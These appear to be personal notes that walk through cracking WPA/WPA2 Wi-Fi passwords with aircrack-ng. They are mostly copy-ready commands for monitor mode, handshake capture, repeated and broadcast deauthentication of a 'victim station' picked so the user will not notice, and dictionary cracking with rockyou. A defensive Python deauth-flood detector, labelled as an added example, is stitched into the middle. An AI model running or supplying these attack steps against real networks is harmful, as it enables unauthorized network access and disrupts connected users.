assuming you’ve got some password dictionaries ready already
see aircrack-obsolete for sniffing OPN and cracking WEP setups
Ubuntu
apt install aircrack-ng wifite ieee-data airodump-ng-oui-update
or from source
what kind of WLAN interface do you have?
ifconfig -a
iwconfig
have a quick look at strongest available SSIDs before you proceed
ifconfig wlan0 up
iwlist wlan0 scan | grep SSID | head
check whether anything is interfering with the interface and, if so, kill it
systemctl stop avahi-daemon
systemctl disable avahi-daemon
systemctl stop avahi-daemon.socket
systemctl disable avahi-daemon.socket
pkill dhclient
pkill wpa_supplicant
pkill avahi-daemon
airmon-ng check
airmon-ng check kill
enter into monitor mode instead of managed mode.
this is optional as the NIC will turn into a sniffer anyhow while using airodump.
you might notice that this does not make any difference on a WLAN controller
ifconfig wlan0 promisc
the right way would rather be
iwconfig wlan0 mode Monitor
but let’s use the dedicated airmon tool we’ve got here.
I am not sure why it is changing the name of the sniffer interface.
airmon-ng start wlan0
iwconfig
ifconfig
check which APs and SSIDs are there, and now look more precisely for associated stations
airodump-ng --manufacturer --uptime --wps -a wlan0mon # --ignore-negative-one q q
be it for WEP or for WPA/WPA2, you need to see some stations, otherwise you won’t get any WEP traffic for IVs and hardly any WPA/WPA2 authentication handshake.
select an SSID with PSK in the AUTH col and then watch it alone, without noise from other networks or channel hopping
#mac=AP-MAC-ADDRESS-HERE
chan=CHANNEL-HERE
ssid=SSID-HERE
also choose a victim station – preferably the one that is most idling, to avoid being noticed by the user
station=STATION-MAC-ADDRESS-HERE
mkdir -p ~/crack/
cd ~/crack/
echo $chan
echo $ssid
mkdir $ssid/
cd $ssid/
rm -f $ssid-*
airodump-ng --manufacturer --uptime --wps -a --channel $chan \
  --essid $ssid --write $ssid wlan0mon
# --bssid $mac --write $mac wlan0mon
and wait for the notice of a captured handshake to appear at the upper-right corner
you can also check with wireshark CLI
tshark -r $ssid-01.cap ...TODO...
you may otherwise speed up the acquisition of 4-way handshakes by de-authenticating stations. a single deauth packet is usually enough – you need to wait about 3 seconds for the supplicant to re-connect.
make sure the SAME SSID variable is defined in THAT OTHER TERMINAL…
echo $ssid
echo $station
aireplay-ng -e $ssid -s $station -c $station --deauth 1 wlan0mon # --or-- -a $mac
otherwise, increase the number of de-auth packets to be sent
aireplay-ng -e $ssid -s $station -c $station --deauth 20 wlan0mon # -g 9 -R --deauth-rc 9
and as a last resort, in case no handshake at all is being captured
aireplay-ng -e $ssid --deauth 0 wlan0mon
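What the de-auth bursts above look like from the other side of the fence, as an added example that is not part of the original notes: a small parser for the fixed IEEE 802.11 management-frame header and a sliding-window detector that flags a BSSID sending a burst of deauth/disassoc frames, plus any deauth addressed to the broadcast address (the no-station case). It assumes raw 802.11 frames without a radiotap header or FCS; the addresses, timestamps, window and threshold are constructed here for the demo and are not values from the notes.

```python
"""Detect deauthentication / disassociation floods in raw 802.11 frames.

Frame layout (IEEE 802.11 management frame, no radiotap, no FCS):
FC(2) Duration(2) Addr1=DA(6) Addr2=SA(6) Addr3=BSSID(6) SeqCtl(2),
followed for deauth/disassoc by a 2-byte little-endian reason code.
"""
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
KICK_SUBTYPES = (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def parse_mgmt(frame):
    """Return header fields of a management frame, or None for anything else."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, fc0 >> 4
    if version != 0 or ftype != 0:          # only type 0 = management
        return None
    reason = None
    if subtype in KICK_SUBTYPES and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return {
        "subtype": subtype,
        "da": mac_str(frame[4:10]),
        "sa": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "reason": reason,
    }


def detect_deauth_floods(frames, window_s=5.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).

    Emits one 'deauth_burst' alert per BSSID the first time it sends at least
    `threshold` deauth/disassoc frames within `window_s` seconds, and a
    'broadcast_deauth' alert for every kick addressed to all stations.
    """
    recent = defaultdict(deque)   # bssid -> timestamps of recent kicks
    flagged = set()
    alerts = []
    for ts, raw in frames:
        f = parse_mgmt(raw)
        if f is None or f["subtype"] not in KICK_SUBTYPES:
            continue
        if f["da"] == BROADCAST:
            alerts.append(("broadcast_deauth", f["bssid"], ts, f["reason"]))
        q = recent[f["bssid"]]
        q.append(ts)
        while ts - q[0] > window_s:       # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and f["bssid"] not in flagged:
            flagged.add(f["bssid"])
            alerts.append(("deauth_burst", f["bssid"], ts, len(q)))
    return alerts


def build_mgmt(subtype, da, sa, bssid, reason=None):
    """Constructed test input only: a minimal management frame for the parser."""
    header = (bytes([subtype << 4, 0x00]) + b"\x00\x00"
              + mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) + b"\x00\x00")
    return header + (struct.pack("<H", reason) if reason is not None else b"")


AP = "aa:bb:cc:dd:ee:01"      # constructed addresses, not from the notes
STA = "11:22:33:44:55:66"

# Constructed trace: a beacon, one legitimate deauth (reason 3 = STA leaving),
# a burst of six deauths within half a second, then a broadcast deauth.
SAMPLE_FRAMES = (
    [(0.0, build_mgmt(SUBTYPE_BEACON, BROADCAST, AP, AP)),
     (1.0, build_mgmt(SUBTYPE_DEAUTH, STA, AP, AP, reason=3))]
    + [(t, build_mgmt(SUBTYPE_DEAUTH, STA, AP, AP, reason=7))
       for t in (10.0, 10.1, 10.2, 10.3, 10.4, 10.5)]
    + [(20.0, build_mgmt(SUBTYPE_DEAUTH, BROADCAST, AP, AP, reason=7))]
)


def run_example():
    return detect_deauth_floods(SAMPLE_FRAMES)


if __name__ == "__main__":
    for kind, bssid, ts, detail in run_example():
        print(f"t={ts:6.1f}  {kind:<17} bssid={bssid} detail={detail}")
```

The single legitimate deauth at t=1.0 is not reported; the burst trips the detector at its fifth frame and the broadcast kick is reported on its own. Management frames carry no integrity protection unless the network uses 802.11w Protected Management Frames (mandatory with WPA3), in which case a station drops deauth frames that lack a valid MIC, which is the actual mitigation for what the aireplay-ng commands above do.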
possibly on a remote server, where heavy CPU load and fan noise won’t bother you…
passlist=/usr/share/wordlists/10-million-password-list-top-1000000.txt # atom 5m14.282s
passlist=/usr/share/wordlists/rockyou.txt # ryzen 12m58,339s vs. atom 74m53.226s
echo $ssid
ls -lhF $ssid-*.cap # got several captures?
time nice aircrack-ng -w $passlist -e $ssid -a 2 $ssid-01.cap # --or-- -b $mac
You’re done with capturing? Go back to station mode
airmon-ng stop wlan0mon
iwconfig
ifconfig
–or– if you didn’t use a dedicated sniffer interface
ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up
18:37:10 Waiting for beacon frame (BSSID: xx:xx:...) on channel xx
18:37:20 No such BSSID available.
==> make sure you define the variables accordingly in that other terminal…
Tutorial: How to Crack WPA/WPA2 https://www.aircrack-ng.org/doku.php?id=cracking_wpa
Aircrack-ng https://github.com/aircrack-ng
sniff traffic on a private SSID? https://networkengineering.stackexchange.com/questions/24236/sniff-traffic-on-a-private-ssid
Sniffing traffic on a secured wifi connection https://security.stackexchange.com/questions/97480/sniffing-traffic-on-a-secured-wifi-connection
WLAN (IEEE 802.11) capture setup https://wiki.wireshark.org/CaptureSetup/WLAN
How to sniff 802.11 packets without going into monitor mode? https://security.stackexchange.com/questions/130716/how-to-sniff-802-11-packets-without-going-into-monitor-mode
IEEE 802.11i-2004 https://en.wikipedia.org/wiki/IEEE_802.11i-2004
Capturing WPA/WPA2 Handshake [MIC/Hash Cracking Process] https://www.cyberpunk.rs/capturing-wpa-wpa2-handshake
How to Decrypt 802.11 https://wiki.wireshark.org/HowToDecrypt802.11
How to decrypt WPA traffic in Wireshark https://miloserdov.org/?p=2525
Wireshark WPA 4-way handshake https://superuser.com/questions/413225/wireshark-wpa-4-way-handshake
I couldn’t deauth any devices using aireplay-ng command in kali linux https://security.stackexchange.com/questions/197287/i-couldnt-deauth-any-devices-using-aireplay-ng-command-in-kali-linux
aireplay DeAuth not functioning https://forum.aircrack-ng.org/index.php?topic=853.0
Aireplay-ng deauth attack not working? https://forums.hak5.org/topic/42852-aireplay-ng-deauth-attack-not-working/
Hacking Wifi using PMKID and Aircrack-ng https://kalitut.com/hacking-wifi-using-pmkid-and-aircrack-ng/
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/
https://unix.stackexchange.com/questions/145192/aircrack-ng-shows-negative-channel
https://forum.aircrack-ng.org/index.php?topic=1378.0
https://forum.backbox.org/software-support/aireplay-ng-ignore-negative-one/
Wifi deauthentication attacks and home security https://mjg59.dreamwidth.org/53968.html